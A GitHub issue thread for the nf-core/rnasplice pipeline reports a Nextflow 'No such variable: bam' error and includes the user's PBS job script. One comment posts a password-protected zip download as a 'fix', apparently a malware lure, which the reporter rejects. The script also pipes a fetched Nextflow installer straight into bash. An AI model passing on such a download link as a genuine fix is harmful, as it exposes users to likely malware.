### ISSUE TITLE
Error executing process > 'NFCORE_RNASPLICE:RNASPLICE:RMATS:CREATE_BAMLIST_SINGLE (1)' caused by: No such variable: bam -- Check script '/home/tud03125/.nextflow/assets/nf-core/rnasplice/./workflows/../subworkflows/local/../../modules/local/create_bamlist_single.nf' at line: 20

### ISSUE THREAD

**Issue by tud03125** [nf-core/rnasplice#152]
### Description of the bug

Error executing process > 'NFCORE_RNASPLICE:RNASPLICE:RMATS:CREATE_BAMLIST_SINGLE (1)'

Caused by:
 No such variable: bam -- Check script '/home/tud03125/.nextflow/assets/nf-core/rnasplice/./workflows/../subworkflows/local/../../modules/local/create_bamlist_single.nf' at line: 20

Source block:
 """
 echo $bam | sed 's: :,:g' > ${cond}_bamlist.txt
 
 cat <<-END_VERSIONS > versions.yml
 "${task.process}":
     sed: \$(echo \$(sed --version 2>&1) | sed 's/^.*GNU sed) //; s/ .*\$//')
 END_VERSIONS
 """

Tip: you can try to figure out what's wrong by changing to the process work dir and showing the script file named `.command.sh`

### Command used and terminal output

```console
#!/bin/bash
#PBS -N rnasplice_pipeline
#PBS -l nodes=1:ppn=16
#PBS -l mem=128gb
#PBS -l walltime=168:00:00 # Set to 168 hours
#PBS -o /home/tud03125/pipeline/normal_human_liver_rnasplice/$PBS_JOBID.out
#PBS -e /home/tud03125/pipeline/normal_human_liver_rnasplice/$PBS_JOBID.err
#PBS -M michael.levin@temple.edu
#PBS -m abe # 'a' for abort, 'b' for begin, 'e' for end

# Debugging: Print environment information
echo "Job started on $(date)"
echo "Running on $(hostname)"
echo "Current directory: $(pwd)"

# Output directory
OUTPUT_DIR="/home/tud03125/pipeline/normal_human_liver_rnasplice"

# Create the output directory if it doesn't exist
mkdir -p "$OUTPUT_DIR"

# Load necessary modules
module load gcc/11.2.0
module load singularity
module load python/3.10.2 # Load Python 3.10.2

# Create an alias for python to point to python3
alias python=python3

# Check that the alias works
python --version # Should output Python 3.10.2

# Set Nextflow version
export NXF_VER=24.04.4

# Install Nextflow if not already installed
if [ ! -f ./nextflow ]; then
   echo "Nextflow not found, downloading..."
   curl -s https://get.nextflow.io | bash
   chmod +x nextflow
fi

# Set Nextflow work directory to avoid quota issues
export NXF_WORK=/home/tud03125/pipeline/normal_human_liver_rnasplice/work

# Run Nextflow with your local rnasplice pipeline
echo "Starting Nextflow pipeline..."
./nextflow run /home/tud03125/pipeline/rnasplice -resume -profile singularity \
   --input /home/tud03125/pipeline/normal_human_liver_design_rnasplice_3.csv \
   --fasta /home/tud03125/pipeline/Homo_sapiens.GRCh38.dna_sm.primary_assembly.fa \
   --gtf /home/tud03125/pipeline/Homo_sapiens.GRCh38.108.gtf \
   --save_reference \
   --outdir /home/tud03125/pipeline/normal_human_liver_rnasplice \
   --star_index /home/tud03125/STAR_index \
   --salmon_index /home/tud03125/new_salmon_index \
   --rmats \
   --suppa \
   --ribo_database_manifest /home/tud03125/ribo_database_manifest.txt \
   --contrasts /home/tud03125/pipeline/contrast_NORMAL_2.csv

# Debugging: Print completion message and end timestamp
echo "Processing complete."
echo "Job ended on $(date)"
```

### Relevant files

All the relevant files are in this opened bug report that I've recently submitted: https://github.com/nf-core/rnasplice/issues/151. Same run. But, after bypassing featureCount error by inserting "-F SAF" line inside featureCount's "main.nf" script, this new error pops up.

### System information

Nextflow version 24.04.04

HPC at Temple University, College of Science and Technology Department

PBS

Singularity

Linux inside Temple University's HPC

nf-core/rnasplice version 1.0.4

**Comment by wahyu-n** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tud03125** [comment]
@wahyu-n Please stop that. This is irrelevant and unhelpful.

**Comment by jma1991** [comment]
Could you please add this to the previous issue instead of creating a new one? That would help keep everything organized. Thanks!
